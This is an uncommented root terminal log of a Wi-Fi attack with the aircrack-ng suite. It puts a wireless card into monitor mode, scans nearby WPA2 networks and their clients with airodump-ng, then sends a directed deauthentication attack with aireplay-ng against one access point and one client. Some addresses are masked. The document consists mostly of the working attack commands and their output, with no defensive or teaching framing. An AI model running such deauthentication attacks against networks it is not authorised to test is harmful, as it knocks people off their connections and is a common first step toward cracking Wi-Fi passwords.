# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: wlp0s20f3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 48:**:**:**:**:74 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::****:****:****:23e2/64 scope link tentative noprefixroute
       valid_lft forever preferred_lft forever
3: enp0s20f0u4u4: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 1000
    link/ether 00:**:**:**:**:d9 brd ff:ff:ff:ff:ff:ff

# airmon-ng start <interface>

# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
3: enp0s20f0u4u4: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 1000
    link/ether 00:**:**:**:**:d9 brd ff:ff:ff:ff:ff:ff
4: wlp0s20f3mon: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default qlen 1000
    link/ieee802.11/radiotap 48:**:**:**:**:73 brd ff:ff:ff:ff:ff:ff

# airodump-ng wlp0s20f3mon
 CH  7 ][ Elapsed: 6 s ][ 2020-03-02 19:15

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 50:**:**:**:**:A1  -54       17        9    0   1  130   WPA2 CCMP   PSK  **********
 50:**:**:**:**:DB  -58       12       42    2  11  130   WPA2 CCMP   PSK  **********
 60:**:**:**:**:20  -68        9        2    0  11  195   WPA2 CCMP   PSK  **********
 50:**:**:**:**:D1  -67       13        9    0   1  130   WPA2 CCMP   PSK  **********
 28:**:**:**:**:37  -72        7        0    0   1  130   WPA2 CCMP   PSK  **********
 C8:**:**:**:**:A1  -70       10        0    0   7  195   WPA2 CCMP   PSK  **********
 78:**:**:**:**:90  -74        4        0    0  11  270   WPA2 CCMP   PSK  **********
 50:**:**:**:**:67  -72       14        0    0   2  130   WPA2 CCMP   PSK  **********
 50:**:**:**:**:C3  -73       11        0    0   1  130   WPA2 CCMP   PSK  **********
 60:**:**:**:**:01  -75        4        0    0   6  540   WPA2 CCMP   PSK  **********
 24:**:**:**:**:59  -76        4        0    0   5  360   WPA2 CCMP   PSK  **********
 04:**:**:**:**:50  -73        5        0    0  10  195   WPA2 CCMP   PSK  **********
 74:**:**:**:**:39  -75        6        0    0   3  720   WPA2 CCMP   PSK  **********
 50:**:**:**:**:AF  -76        6        0    0   1  130   WPA2 CCMP   PSK  **********
 78:**:**:**:**:B0  -75        1        2    0   4  195   WPA2 CCMP   PSK  **********
 2C:**:**:**:**:78  -79        3        0    0   1  360   WPA2 CCMP   PSK  **********

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 (not associated)   DA:**:**:**:**:9D  -53    0 - 5      1        2
 50:**:**:**:**:A1  98:**:**:**:**:73  -61    0 - 0e     0        2
 50:**:**:**:**:A1  88:**:**:**:**:04  -68    0e-24      0       10
 50:**:**:**:**:DB  68:**:**:**:**:7C   -1    0e- 0      0        9
 50:**:**:**:**:DB  70:**:**:**:**:7F  -46    0e- 1e  1456       64

# aireplay-ng --deauth 1 -a 50:**:**:**:**:A1 -c 5C:**:**:**:**:B7 wlp0s20f3mon
19:07:43  Waiting for beacon frame (BSSID: 50:**:**:**:**:A1) on channel 1
19:07:44  Sending 64 directed DeAuth (code 7). STMAC: [5C:**:**:**:**:B7] [54|47 ACKs]

# airmon-ng stop wlp0s20f3mon
